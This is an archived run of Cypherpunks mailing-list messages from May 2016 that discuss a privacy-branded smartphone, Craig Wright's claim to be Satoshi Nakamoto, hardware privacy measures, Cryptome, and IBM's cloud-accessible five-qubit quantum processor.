From rayzer at riseup.net Sun May 1 09:12:24 2016 From: rayzer at riseup.net (Rayzer) Date: Sun, 1 May 2016 09:12:24 -0700 Subject: FYI: 'Private Smartphone' ... UnaPhone Zenith Message-ID: <57262AE8.2020902@riseup.net> Via tuta.io, links are shortlinks to indiegogo: Tutanota Introduces Private Smartphone: UnaPhone Zenith Dear privacy-friend, we are excited to let you know that we have partnered with Una to bring to you the most private and secure smartphone: the UnaPhone Zenith. We at Tutanota and Una believe that a phone should not be your personal surveillance device, but simply your personal phone, where all the data remains with you and cannot be exploited. Una has just launched a crowdfunding campaign to bring the Zenith to life . As their partner we are proud to let you know about this perfect chance to get the Zenith as an early bird! We call it: the Anti-Google Phone! The UnaPhone Zenith is the first truly secure and private Android smartphone without any compromises. It doesn’t use any Google services, shady apps or strange permissions. With the Zenith you can stay calm knowing that you are never tracked and that your data is never being sold. The phone comes with the most secure open source third party apps. Of course, the Tutanota App is already pre-installed. We hope you share our passion for privacy and support this project . Personally, we are thrilled that there will be a phone available making sure that our data cannot be abused - not even by the carrier. We can't wait to get a Zenith ourselves! Cheers, your TutanotaTeam -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2170 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: OpenPGP digital signature URL: From juan.g71 at gmail.com Sun May 1 12:40:09 2016 From: juan.g71 at gmail.com (juan) Date: Sun, 1 May 2016 16:40:09 -0300 Subject: FYI: 'Private Smartphone' ... UnaPhone Zenith In-Reply-To: <57262AE8.2020902@riseup.net> References: <57262AE8.2020902@riseup.net> Message-ID: <57265b43.61ec420a.61455.ffffb1fd@mx.google.com> On Sun, 1 May 2016 09:12:24 -0700 Rayzer wrote: > > We call it: the Anti-Google Phone! > > The UnaPhone Zenith is the first truly secure and private Android android-based-anti-google-phone - amazing From rayzer at riseup.net Sun May 1 18:18:41 2016 From: rayzer at riseup.net (Rayzer) Date: Sun, 1 May 2016 18:18:41 -0700 Subject: FYI: 'Private Smartphone' ... UnaPhone Zenith In-Reply-To: <57265b43.61ec420a.61455.ffffb1fd@mx.google.com> References: <57262AE8.2020902@riseup.net> <57265b43.61ec420a.61455.ffffb1fd@mx.google.com> Message-ID: <5726AAF1.7060700@riseup.net> On 05/01/2016 12:40 PM, juan wrote: > On Sun, 1 May 2016 09:12:24 -0700 > Rayzer wrote: > >> We call it: the Anti-Google Phone! >> >> The UnaPhone Zenith is the first truly secure and private Android > android-based-anti-google-phone - amazing > > I haven't investigated. Maybe open-source hardware... Dunno. -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: OpenPGP digital signature URL: From rysiek at hackerspace.pl Sun May 1 09:48:33 2016 From: rysiek at hackerspace.pl (rysiek) Date: Sun, 01 May 2016 18:48:33 +0200 Subject: Do you notice significant persistent change in climate? In-Reply-To: <20160406124923.GA677@sivokote.iziade.m$> References: <20160406124923.GA677@sivokote.iziade.m$> Message-ID: <9625132.2ubL223DsG@lapuntu> Dnia środa, 6 kwietnia 2016 15:49:23 CEST Georgi Guninski pisze: > Do you notice significant persistent change in climate during your > lifetime? > > Also increase in major natural disasters (not counting m$ products/ > services)? > > I do in Bulgaria, SE Europe. I do too, in certain unspecified locations. Most visible in my locations: winters are much milder, much, much less snow. -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From rayzer at riseup.net Sun May 1 18:59:12 2016 From: rayzer at riseup.net (Rayzer) Date: Sun, 1 May 2016 18:59:12 -0700 Subject: Cryptome In-Reply-To: <57229EFC.701@pilobilus.net> References: <57229EFC.701@pilobilus.net> Message-ID: <5726B470.1070902@riseup.net> On 04/28/2016 04:38 PM, Steve Kinney wrote: > Cryptome is a riddle wrapped in a mystery inside an enigma. Amanda! ("The only meat in the world sweeter, hotter, and pinker than Amanda's twat is Carolina barbecue.") https://en.wikiquote.org/wiki/Tom_Robbins#Another_Roadside_Attraction_.281971.29 Study guide http://www.bookrags.com/studyguide-roadside-attraction/#gsc.tab=0 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: OpenPGP digital signature URL: From rysiek at hackerspace.pl Sun May 1 12:00:04 2016 From: rysiek at hackerspace.pl (rysiek) Date: Sun, 01 May 2016 21:00:04 +0200 Subject: Cryptography being defended on social media and YouTube. This is on the front page of reddit right now In-Reply-To: References: Message-ID: <4546686.AtheXIdnSR@lapuntu> Dnia wtorek, 26 kwietnia 2016 01:09:02 CEST grarpamp pisze: > On 4/14/16, Erik Granger wrote: > > CGPGrey - Should all locks have keys? Phones, Castles, Encryption, and > > You. > > > > https://www.youtube.com/watch?v=VPBH1eW28mo > > > > I like this video for a few reasons, it explains why cryptography is > > important and why backdoors are bad in layman terms without actually going > > into how cryptography works. I'm happy to see a lot of discussion on > > cryptography taking place all over the internet, and that young people are > > very interested in the technology. > > "...digital locks protect the contents of our minds..." And then there's John Oliver's segment: https://www.youtube.com/watch?v=zsjZ2r9Ygzw Not a fan of the "commercial" at the end, but apart from that, not bad. -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From rysiek at hackerspace.pl Sun May 1 12:14:11 2016 From: rysiek at hackerspace.pl (rysiek) Date: Sun, 01 May 2016 21:14:11 +0200 Subject: Do we have backup plan if this list disappears? In-Reply-To: <20160419110644.GB674@sivokote.iziade.m$> References: <20160419110644.GB674@sivokote.iziade.m$> Message-ID: <1511711.rNXWIhePNB@lapuntu> Hi, Dnia wtorek, 19 kwietnia 2016 14:06:44 CEST Georgi Guninski pisze: > Do we have backup plan if this list disappears? > > Two public security lists I have been on degraded to the point I > unsubscribed (on the second they filtered me at SMTP). I am working on making Schleuder3 easily runnable through the magic of Docker: https://git.occrp.org/libre/schlocker-compose/ Schleuder3 is a GPG-enabled mailinglist manager. Perhaps it's something we might want to look at. Or perhaps we should just move to a truly decentralized, p2p solutions. Twister supports groups nowadays: http://twister.net.co/ > Generalization: > > Do we have backup plan if the interwebz lose a lot of connectivity? > (maybe some kind of radio communications). > > Probably revealing the plans to adversaries is not good idea, not > sure. That's a whole different story, on a whole different level. I would say, these are two different questions: - having a place like CypherPunks to discuss stuff; - making sure the infrastructure needed for it is in place. Mesh networking would be part of the answer, I guess. -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From grarpamp at gmail.com Mon May 2 01:10:08 2016 From: grarpamp at gmail.com (grarpamp) Date: Mon, 2 May 2016 04:10:08 -0400 Subject: Craig Wright is Satoshi Nakamoto Message-ID: http://www.bbc.co.uk/news/technology-36168863 Australian entrepreneur Craig Wright has publicly identified himself as Bitcoin creator Satoshi Nakamoto. From oshwm at openmailbox.org Mon May 2 00:05:43 2016 From: oshwm at openmailbox.org (oshwm) Date: Mon, 2 May 2016 08:05:43 +0100 Subject: FYI: 'Private Smartphone' ... UnaPhone Zenith In-Reply-To: <5726AAF1.7060700@riseup.net> References: <57262AE8.2020902@riseup.net> <57265b43.61ec420a.61455.ffffb1fd@mx.google.com> <5726AAF1.7060700@riseup.net> Message-ID: <5726FC47.1080905@openmailbox.org> On 02/05/16 02:18, Rayzer wrote: > > On 05/01/2016 12:40 PM, juan wrote: >> On Sun, 1 May 2016 09:12:24 -0700 >> Rayzer wrote: >> >>> We call it: the Anti-Google Phone! >>> >>> The UnaPhone Zenith is the first truly secure and private Android >> android-based-anti-google-phone - amazing >> >> > I haven't investigated. Maybe open-source hardware... Dunno. > If I remember correctly, Tutanota were offering privacy email services but in their T&Cs indicated they wanted a lot of fairly invasive Personally Identifiable information in order to provide this service so my thoughts are to ignore this completely. From felix at tribut.de Mon May 2 01:54:54 2016 From: felix at tribut.de (Felix Eckhofer) Date: Mon, 02 May 2016 10:54:54 +0200 Subject: Craig Wright is Satoshi Nakamoto In-Reply-To: References: Message-ID: <552c0eef302a554f0b429567ce706f3c@tribut.de> Hey. Am 02.05.2016 10:10, schrieb grarpamp: > http://www.bbc.co.uk/news/technology-36168863 > Australian entrepreneur Craig Wright has publicly identified > himself as Bitcoin creator Satoshi Nakamoto. Apparently, the proof might not proof much: https://www.reddit.com/r/Bitcoin/comments/4hf4xj/creator_of_bitcoin_reveals_identity/d2pfnk6 felix From hettinga at gmail.com Mon May 2 11:43:39 2016 From: hettinga at gmail.com (Robert Hettinga) Date: Mon, 2 May 2016 14:43:39 -0400 Subject: [Cryptography] Craig Wright is Satoshi Nakamoto In-Reply-To: References: Message-ID: <2CF6A1BE-9912-4FE6-98F4-202E539D9795@gmail.com> > On May 2, 2016, at 2:17 PM, Erik Granger wrote: > > I'll believe it when he signs arbitrary messages with satoshis key. No signature, no story. Spend the coins. Pics or it didn’t happen. Cheers, RAH From juan.g71 at gmail.com Mon May 2 12:20:26 2016 From: juan.g71 at gmail.com (juan) Date: Mon, 2 May 2016 16:20:26 -0300 Subject: [Cryptography] Craig Wright is Satoshi Nakamoto In-Reply-To: <2CF6A1BE-9912-4FE6-98F4-202E539D9795@gmail.com> References: <2CF6A1BE-9912-4FE6-98F4-202E539D9795@gmail.com> Message-ID: <5727a825.6ca7420a.a5d9.1c52@mx.google.com> On Mon, 2 May 2016 14:43:39 -0400 Robert Hettinga wrote: > > > On May 2, 2016, at 2:17 PM, Erik Granger > > wrote: > > > > I'll believe it when he signs arbitrary messages with satoshis key. > > No signature, no story. > > Spend the coins. > Pics or it didn’t happen. What coins should a person move/spend to prove that he is 'satoshi'? And where's the proof that addresses(or public keys) a,b,c are satoshi's anyway? I took a look at the first btc blocks (never bothered before, I admit). My sampling is pretty incomplete, but, virtually all the blocks I checked look like this one block# 1000 https://blockchain.info/block/00000000c937983704a73af28acdec37b049d214adbda81d7e2a3dd146f6ed09 only the mining fee going to an unspent address. #5000 same #10000 same #20000 same #30000 . #40000 . #50000 . #15000 . #25000 . #35000 . #45000 . All those blocks are similar. Each 50 btc lot goes to a different address and remains there. As far as I can tell there isn't a single address full of bitcoins that one would assume belongs to 'satoshi'? > > Cheers, > RAH > > From rysiek at hackerspace.pl Mon May 2 12:08:24 2016 From: rysiek at hackerspace.pl (rysiek) Date: Mon, 02 May 2016 21:08:24 +0200 Subject: Craig Wright is Satoshi Nakamoto In-Reply-To: <552c0eef302a554f0b429567ce706f3c@tribut.de> References: <552c0eef302a554f0b429567ce706f3c@tribut.de> Message-ID: <2968950.WF3U38DWHy@lapuntu> Dnia poniedziałek, 2 maja 2016 10:54:54 CEST Felix Eckhofer pisze: > Hey. > > Am 02.05.2016 10:10, schrieb grarpamp: > > http://www.bbc.co.uk/news/technology-36168863 > > Australian entrepreneur Craig Wright has publicly identified > > himself as Bitcoin creator Satoshi Nakamoto. > > Apparently, the proof might not proof much: > https://www.reddit.com/r/Bitcoin/comments/4hf4xj/creator_of_bitcoin_reveals_ > identity/d2pfnk6 Yeah, I might identify as Satoshi. So what. Ping me when somebody spends bitcoins from Satoshi's stash. -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From admin at pilobilus.net Mon May 2 19:08:36 2016 From: admin at pilobilus.net (Steve Kinney) Date: Mon, 2 May 2016 22:08:36 -0400 Subject: Needs more hardware hacking dox In-Reply-To: <20160429144717.GA680@sivokote.iziade.m$> References: <572101A7.3010402@pilobilus.net> <20160429144717.GA680@sivokote.iziade.m$> Message-ID: <57280824.3060004@pilobilus.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 04/29/2016 10:47 AM, Georgi Guninski wrote: >> How many lusers put tape over their laptop camera lens, but >> neglect to cut the pins on the microphone? How many people even >> know their shiny > > Wouldn't this kill the main functionality of the hardware (smart) > phone? > > OT: is enough tinfoil around hardware good enough Faraday cage? ;) I would have thought it obvious that I was talking about laptops, where people (even Fox Muldur per a recent X Files episode) actually do that tape thing. Everyone knows that a phone has a built in microphone, nobody forgets that. Portable workstation computers? Not so much, except those who do use them routinely for teleconferencing. Hence the comic aspect of tape over the lens with a live microphone ignored. If one is concerned about being tracked during a specific time frame via a "smart" phone, the solutions include: Leave it home, ask a friend to take it on a trip with them, or pull the battery. Which to use depends on the cause of that concern and other unique parameters. Since user surveillance, tracking and profiling is commercially valuable to the vendors of IOT gadgetry, software solutions will be placebos, or at best an arms race with the vast majority of end users on the loser's bench for the duration. Fact of the matter is, the most practical and reliable means of addressing privacy concerns related to the "internet of things" is at the gross hardware level DIY level, by disabling sensor and/or comms components where and as the user deems this a good trade off. :o) -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.22 (GNU/Linux) iQEcBAEBAgAGBQJXKAgkAAoJEECU6c5Xzmuqd7UIAMw4p7A+n9h+SIxhCaxJ9afu KAo817i5lun2RivghLHTMXyRWRM+gcETDdBMHLMK1XomlMWzuUO8btFV3A3SIHct amF6bCHtQwOs3etAcQwzIMaz5JLIrSK69nPwXwMtouvsXD5XC1D2qSa47iWXj1ws 2aCufG4FGdVe/gxJ81MD1X5xZ/CylN4fTjIIgrAXvkCkHQc/WccuuUm4zrumqwAJ wtG1mwL5PWNUp7tpmA67km4vVvM0WT84eyKOEkzV/QNP9AOKHmHOmGEL3KVfPKv9 Fp+8aQ8nkSM36Jmp/L/FdMqZ9STTsY7yWHC9T8FutCNYRMhzPk+jfL3hc52iW+U= =ORh/ -----END PGP SIGNATURE----- From grarpamp at gmail.com Mon May 2 23:51:12 2016 From: grarpamp at gmail.com (grarpamp) Date: Tue, 3 May 2016 02:51:12 -0400 Subject: FYI: 'Private Smartphone' ... UnaPhone Zenith In-Reply-To: <5726FC47.1080905@openmailbox.org> References: <57262AE8.2020902@riseup.net> <57265b43.61ec420a.61455.ffffb1fd@mx.google.com> <5726AAF1.7060700@riseup.net> <5726FC47.1080905@openmailbox.org> Message-ID: On 5/2/16, oshwm wrote: > If I remember correctly, Tutanota were offering privacy email services > but in their T&Cs indicated they wanted a lot of fairly invasive > Personally Identifiable information in order to provide this service so > my thoughts are to ignore this completely. tor-talk says tuta nukes tor accts, so yeah, it's an op. From rayzer at riseup.net Tue May 3 07:37:49 2016 From: rayzer at riseup.net (Rayzer) Date: Tue, 3 May 2016 07:37:49 -0700 Subject: FYI: 'Private Smartphone' ... UnaPhone Zenith In-Reply-To: References: <57262AE8.2020902@riseup.net> <57265b43.61ec420a.61455.ffffb1fd@mx.google.com> <5726AAF1.7060700@riseup.net> <5726FC47.1080905@openmailbox.org> Message-ID: <5728B7BD.20501@riseup.net> On 05/02/2016 11:51 PM, grarpamp wrote: > On 5/2/16, oshwm wrote: >> If I remember correctly, Tutanota were offering privacy email services >> but in their T&Cs indicated they wanted a lot of fairly invasive >> Personally Identifiable information in order to provide this service so >> my thoughts are to ignore this completely. > tor-talk says tuta nukes tor accts, so yeah, it's an op. > You mean accounts that use tor to access their webmail? Because I have a paid-for acct and I occasionally use torbrowser to access my inbox and... As the Reverend Gary Davis once said about 'everyone in NYC saying he wrote "Candyman Blues"'; "I guess that goes to show what everyone in NYC knows!"... Extrapolate. You're the 'op'. Maybe the WHOLE of tor-talk is 'op'-erators. WTF knows! -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: OpenPGP digital signature URL: From fedor.brunner at azet.sk Tue May 3 01:35:17 2016 From: fedor.brunner at azet.sk (Fedor Brunner) Date: Tue, 3 May 2016 10:35:17 +0200 Subject: Cryptome In-Reply-To: References: Message-ID: <572862C5.2050102@azet.sk> According to: https://www.wauland.de/en/news.html With a letter from the Hamburg tax authorities, the Wau Holland Foundation's charitable status (tax exemption) was reinstated, applying retroactively for 2011. Ryan Carboni: > What is Cryptome? > > "Cryptome welcomes documents for publication that are prohibited by > governments worldwide, in particular material on freedom of > expression, privacy, cryptology, dual-use technologies, national > security, intelligence, and secret governance -- open, secret and > classified documents -- but not limited to those." > > A trollish statement saying, "everything in short". > > Cryptome insinuated that Protonmail is less secure after using an > israeli reverse proxy ( > https://web.archive.org/web/20160318180805/https://cryptome.org/2015/11/protonmail-ddos.htm > ). How is it less secure? > > Protonmail's response: > https://protonmail.com/support/knowledge-base/protonmail-israel-radware/ > > It says something if Fox News allowed a favorable AP report on > Cryptome on their website: > http://www.foxnews.com/us/2013/03/09/older-less-flashy-than-wikileaks-cryptome-perseveres-as-favored-site-for.html > > https://web.archive.org/web/20160329170005/http://www.theregister.co.uk/2010/12/07/cryptome_on_wikileaks/ > John Young states that Wikileaks is a criminal organization for needing money. > > Compare and contrast Cryptome and Wikileaks: > The Wau Holland Foundation collected $1.2 million for Wikileaks, and > later no longer could recieve donations from Paypal, while it's > charitable status was challenged and revoked by German authorities. > > Cryptome is now a non-profit. > > From rayzer at riseup.net Thu May 5 20:03:20 2016 From: rayzer at riseup.net (Rayzer) Date: Thu, 5 May 2016 20:03:20 -0700 Subject: Craig Wright suspends campaign to be the 2016 Satoshi Nakamoto Message-ID: <572C0978.7080903@riseup.net> Aussie entrepreneur Craig Wright backed off from his offer to produce more evidence that he is Bitcoin creator Satoshi Nakamoto. He's also wiped his website, except for a final, rather ominous message. http://boingboing.net/2016/05/05/craig-wright-reneges-on-offer.html -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: OpenPGP digital signature URL: From peter at m-o-o-t.org Fri May 6 01:57:45 2016 From: peter at m-o-o-t.org (Peter Fairbrother) Date: Fri, 6 May 2016 09:57:45 +0100 Subject: Craig Wright suspends campaign to be the 2016 Satoshi Nakamoto In-Reply-To: <572C0978.7080903@riseup.net> References: <572C0978.7080903@riseup.net> Message-ID: <572C5C89.5060500@m-o-o-t.org> On 06/05/16 04:03, Rayzer wrote: > > Aussie entrepreneur Craig Wright backed off from his offer to produce > more evidence More evidence? Did he produce any evidence at all (which hadn't been faked)? People have wondered aloud at his motive, but it isn't difficult - there is even a word for it, pretender. Besides, apart from being cryptographically only semi-literate and an indifferent coder, he is too Aussie, too young, and too tall to have been Satoshi. :¬) -- Peter Fairbrother that he is Bitcoin creator Satoshi Nakamoto. He's also > wiped his website, except for a final, rather ominous message. > > > http://boingboing.net/2016/05/05/craig-wright-reneges-on-offer.html > From seanl at literati.org Fri May 6 13:48:00 2016 From: seanl at literati.org (Sean Lynch) Date: Fri, 6 May 2016 13:48:00 -0700 Subject: IBM Quantum Computing In-Reply-To: <572cf01e.a4608c0a.cb8da.ffffd1a9@mx.google.com> References: <572cf01e.a4608c0a.cb8da.ffffd1a9@mx.google.com> Message-ID: On Fri, May 6, 2016 at 12:27 PM, juan wrote: > > > > related > > http://www.scottaaronson.com/blog/?p=1400 > > http://www.scottaaronson.com/blog/?p=2448 These are both about D-Wave's machines, which are not universal quantum computers. IBM's is universal, though it's only 5 qubits, not even as many qubits as they used to factor the number 15. Still, I think there's plenty of reason to be skeptical of QC, and even if you're not that skeptical of it, we've still got decades before it'll be cracking even 1024 bit RSA. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1116 bytes Desc: not available URL: From seanl at literati.org Fri May 6 14:58:52 2016 From: seanl at literati.org (Sean Lynch) Date: Fri, 6 May 2016 14:58:52 -0700 Subject: IBM Quantum Computing In-Reply-To: <572d0f4b.88c48c0a.3a423.ffffe374@mx.google.com> References: <572cf01e.a4608c0a.cb8da.ffffd1a9@mx.google.com> <572d0f4b.88c48c0a.3a423.ffffe374@mx.google.com> Message-ID: On Fri, May 6, 2016 at 2:40 PM, juan wrote: > On Fri, 6 May 2016 13:48:00 -0700 > Sean Lynch wrote: > > > On Fri, May 6, 2016 at 12:27 PM, juan wrote: > > > > > > > > > > > > > > related > > > > > > http://www.scottaaronson.com/blog/?p=1400 > > > > > > http://www.scottaaronson.com/blog/?p=2448 > > > > > > These are both about D-Wave's machines, which are not universal > > quantum computers. IBM's is universal, > > Yes, that's why I said "related" =P > > What I found interesting about the d-wave 'affair' is that they > can't even prove that the machines are using some kind of > quantum effect. I'd expect the masters of the universe to be a > bit less sloppy in scientific matters. > They can't "prove" it, but AIUI given the current evidence there would have to be something pretty strange going on for it not to be quantum effects. But even if they ARE using quantum effects, they still need to prove they're faster than any classical algorithm for some problem. > > though it's only 5 qubits, not > > even as many qubits as they used to factor the number 15. Still, I > > think there's plenty of reason to be skeptical of QC, and even if > > you're not that skeptical of it, we've still got decades before it'll > > be cracking even 1024 bit RSA. > > > I just learned about "topological qbits" - they seem even less > practical than ibm's stuff, at least for the time being... > > Depends on what you mean by "practical". Perhaps fewer applications due to the fact that you can only approximate the answer (with accuracy increasing as you increase the number of braids), but potentially more scalable because the braids are more stable. If IBM's computer can't be scaled up to the point that it's more than a toy, but TQCs can, then the TQC would be the practical one. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 3022 bytes Desc: not available URL: From juan.g71 at gmail.com Fri May 6 12:27:39 2016 From: juan.g71 at gmail.com (juan) Date: Fri, 6 May 2016 16:27:39 -0300 Subject: IBM Quantum Computing In-Reply-To: References: Message-ID: <572cf01e.a4608c0a.cb8da.ffffd1a9@mx.google.com> related http://www.scottaaronson.com/blog/?p=1400 http://www.scottaaronson.com/blog/?p=2448 From juan.g71 at gmail.com Fri May 6 14:40:39 2016 From: juan.g71 at gmail.com (juan) Date: Fri, 6 May 2016 18:40:39 -0300 Subject: IBM Quantum Computing In-Reply-To: References: <572cf01e.a4608c0a.cb8da.ffffd1a9@mx.google.com> Message-ID: <572d0f4b.88c48c0a.3a423.ffffe374@mx.google.com> On Fri, 6 May 2016 13:48:00 -0700 Sean Lynch wrote: > On Fri, May 6, 2016 at 12:27 PM, juan wrote: > > > > > > > > > related > > > > http://www.scottaaronson.com/blog/?p=1400 > > > > http://www.scottaaronson.com/blog/?p=2448 > > > These are both about D-Wave's machines, which are not universal > quantum computers. IBM's is universal, Yes, that's why I said "related" =P What I found interesting about the d-wave 'affair' is that they can't even prove that the machines are using some kind of quantum effect. I'd expect the masters of the universe to be a bit less sloppy in scientific matters. > though it's only 5 qubits, not > even as many qubits as they used to factor the number 15. Still, I > think there's plenty of reason to be skeptical of QC, and even if > you're not that skeptical of it, we've still got decades before it'll > be cracking even 1024 bit RSA. I just learned about "topological qbits" - they seem even less practical than ibm's stuff, at least for the time being... From juan.g71 at gmail.com Fri May 6 15:31:16 2016 From: juan.g71 at gmail.com (juan) Date: Fri, 6 May 2016 19:31:16 -0300 Subject: IBM Quantum Computing In-Reply-To: References: <572cf01e.a4608c0a.cb8da.ffffd1a9@mx.google.com> <572d0f4b.88c48c0a.3a423.ffffe374@mx.google.com> Message-ID: <572d1b28.4352370a.671d3.ffffec5d@mx.google.com> On Fri, 6 May 2016 14:58:52 -0700 Sean Lynch wrote: > Depends on what you mean by "practical". Perhaps fewer applications > due to the fact that you can only approximate the answer (with > accuracy increasing as you increase the number of braids), but > potentially more scalable because the braids are more stable. If > IBM's computer can't be scaled up to the point that it's more than a > toy, but TQCs can, then the TQC would be the practical one. Yes, that's the theory...In theory topological qbits could be produced in quantity, but in pactice not a single t. qbit has been built as far as I can tell. From afalex169 at gmail.com Fri May 6 09:31:32 2016 From: afalex169 at gmail.com (=?UTF-8?B?INCQ0LvQtdC60YHQsNC90LTRgCA=?=) Date: Fri, 6 May 2016 19:31:32 +0300 Subject: IBM Quantum Computing Message-ID: ​​ ​​ Well, we have been hearing about this Quantum technology for years... It's not mature yet, but.... potentially... when it will be mature... it will be able to break any crypto-system. (oh, maybe it is already mature in the Catacombs of the NSA). _______ https://www.research.ibm.com/quantum/#start https://www-03.ibm.com/press/us/en/pressrelease/49661.wss https://www.youtube.com/watch?v=jf7D8snlsnQ http://spectrum.ieee.org/tech-talk/computing/hardware/ibm-puts-a-quantum-processor-in-the-cloud ​IBM scientists have built a quantum processor that users can access through a first-of-a-kind quantum computing platform delivered via the IBM Cloud onto any desktop or mobile device. IBM believes quantum computing is the future of computing and has the potential to solve certain problems that are impossible to solve on today’s supercomputers. The cloud-enabled quantum computing platform, called IBM Quantum Experience , will allow users to run algorithms and experiments on IBM’s quantum processor, work with the individual quantum bits (qubits), and explore tutorials and simulations around what might be possible with quantum computing. The quantum processor is composed of five superconducting qubits and is housed at the IBM T.J. Watson Research Center in New York. The five-qubit processor represents the latest advancement in IBM’s quantum architecture that can scale to larger quantum systems. It is the leading approach towards building a universal quantum computer . A universal quantum computer can be programmed to perform any computing task and will be exponentially faster than classical computers for a number of important applications for science and business. A universal quantum computer does not exist today, but IBM envisions medium-sized quantum processors of 50-100 qubits to be possible in the next decade. With a quantum computer built of just 50 qubits, none of today’s TOP500 supercomputers could successfully emulate it, reflecting the tremendous potential of this technology. The community of quantum computer scientists and theorists is working to harness this power, and applications in optimization and chemistry will likely be the first to demonstrate quantum speed-up. “Quantum computers are very different from today’s computers, not only in what they look like and are made of, but more importantly in what they can do. Quantum computing is becoming a reality and it will extend computation far beyond what is imaginable with today’s computers,” said Arvind Krishna, senior vice president and director, IBM Research. “This moment represents the birth of quantum cloud computing. By giving hands-on access to IBM’s experimental quantum systems, the IBM Quantum Experience will make it easier for researchers and the scientific community to accelerate innovations in the quantum field, and help discover new applications for this technology.” With Moore’s Law running out of steam, quantum computing will be among the technologies that could usher in a new era of innovation across industries. This leap forward in computing could lead to the discovery of new pharmaceutical drugs and completely safeguard cloud computing systems. It could also unlock new facets of artificial intelligence (which could lead to future, more powerful Watson technologies), develop new materials science to transform industries, and search large volumes of big data . *IBM Quantum Experience* Quantum information is very fragile and needs to be protected from any errors that can result from heat and electromagnetic radiation. Signals are sent in and out of a cryogenic dilution refrigerator to measure operations on the quantum processor. The IBM team has made a number of robust engineering advances both at the device level and in the electronic controls to give IBM Quantum Experience users unprecedented and reliably high-quality performance in this five-qubit processor. Coupled with software expertise from the IBM Research ecosystem, the team has built a dynamic user interface on the IBM Cloud platform that allows users to easily connect to the quantum hardware via the cloud. The team sees the introduction to the public of this complete quantum computing framework as just the start of a new user community, which embraces the quantum world and how it works. In the future, users will have the opportunity to contribute and review their results in the community hosted on the IBM Quantum Experience and IBM scientists will be directly engaged to offer more research and insights on new advances. IBM plans to add more qubits and different processor arrangements to the IBM Quantum Experience over time, so users can expand their experiments and help uncover new applications for the technology. *Quantum computing – a different way of thinking* We live in a world where classical physics defines our experiences and our intuition, and ultimately how we process information. However, nature at the atomic level is governed by a different set of rules known as quantum mechanics. It is beyond the reach of classical computers to solve problems that exist in nature in which quantum mechanics plays a role, for example, understanding how molecules behave. To overcome this, in 1981, Richard Feynman proposed to build computers based on the laws of quantum mechanics. Over three decades later, IBM is helping to make this a reality. Quantum computing works fundamentally differently from today’s computers. A classical computer makes use of bits to process information, where each bit represents either a one or a zero. In contrast, a qubit can represent a one, a zero, or both at once, which is known as superposition. This property along with other quantum effects enable quantum computers to perform certain calculations vastly faster than is possible with classical computers. Most of today’s quantum computing research in academia and industry is focused on building a universal quantum computer. The major challenges include creating qubits of high quality and packaging them together in a scalable way, so they can perform complex calculations in a controllable way. IBM employs superconducting qubits that are made with superconducting metals on a silicon chip and can be designed and manufactured using standard silicon fabrication techniques. Last year, IBM scientists demonstrated critical breakthroughs to detect quantum errors by combining superconducting qubits in latticed arrangements, and whose quantum circuit design is the only physical architecture that can scale to larger dimensions. Now, IBM scientists have achieved a further advance by combining five qubits in the lattice architecture, which demonstrates a key operation known as a parity measurement – the basis of many quantum error correction protocols. The road towards universal quantum computing hinges upon the achievement of quantum error correction, and the IBM team has taken another important step down this challenging path. *New frontiers for quantum computing* There has been tremendous progress and interest in the field of quantum of computing in recent years. By giving users access to the IBM Quantum Experience, it will help businesses and organizations begin to understand the technology’s potential, for universities to grow their teaching programs in quantum computing and related subjects, and for students to become aware of promising new career paths. “It is a beautiful challenge to pursue the path to build the first universal quantum computer, but it requires us to change how we think about the world. Access to early quantum computing prototypes will be key in imagining and developing future applications,” said Dario Gil, vice president of science and solutions, IBM Research. “If you want to understand what a true quantum computer will do for you and how it works, this is the place to do it. You won’t experience it anywhere else.” IBM’s quantum computing platform is a core initiative within the newly formed IBM Research Frontiers Institute . The Frontiers Institute is a consortium that develops and shares ground-breaking computing technologies to spur world-changing innovations. Companies from diverse industries can leverage IBM’s research talent and cutting-edge infrastructure to explore what the future of quantum computing may mean for their organization and business. Founding members of the Frontiers Institute include Samsung, JSR, and Honda. To access the IBM Quantum Experience and for more information on IBM’s quantum computing research, please visit www.ibm.com/quantumcomputing. To learn more about the IBM Research Frontiers Institute, please visit www.ibm.com/frontiers. Note to journalists and bloggers: You can view and download b-roll on IBM’s quantum computing efforts at http://www.thenewsmarket.com/ibm. The video is available in HD, standard definition broadcast and streaming quality. ​ -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 14001 bytes Desc: not available URL: From bascule at gmail.com Fri May 6 22:25:25 2016 From: bascule at gmail.com (Tony Arcieri) Date: Fri, 6 May 2016 22:25:25 -0700 Subject: [Cryptography] Proof-of-Satoshi fails Proof-of-Proof. In-Reply-To: 